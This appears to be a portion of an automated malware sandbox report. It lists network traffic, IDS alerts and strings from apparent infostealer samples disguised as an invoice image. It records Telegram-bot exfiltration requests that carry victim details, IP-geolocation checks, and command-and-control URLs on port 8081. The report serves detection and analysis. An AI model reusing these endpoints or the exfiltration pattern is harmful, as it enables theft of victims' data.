                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2009/03/2025%20/%2008:58:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:27:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                      Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                      Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49713 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49726 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49714 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49719 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49721 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49720 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.64.1:443
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49715 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49716 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49729 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49730 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2009/03/2025%20/%2008:58:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:27:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:40:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:40:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                      Source: Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                      Source: Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                      Source: Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                      Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.00000000025CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                      Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.00000000026EA000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3627009294.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.00000000025CA000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.000000000267B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.0000000002549000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: Native_New-Nova.exe, 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: svchost.exe, 0000000B.00000002.2872650380.000001DE526A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000000B.00000003.1206385373.000001DE52818000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: edb.log.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 0000000B.00000003.1206385373.000001DE52818000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 0000000B.00000003.1206385373.000001DE52818000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 0000000B.00000003.1206385373.000001DE5284D000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: qmgr.db.11.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.0000000002718000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.00000000025EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1223205034.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3627009294.000000000267B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, lVbhkOPdhyxT.exe, 0000000D.00000002.1276643697.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.0000000002549000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
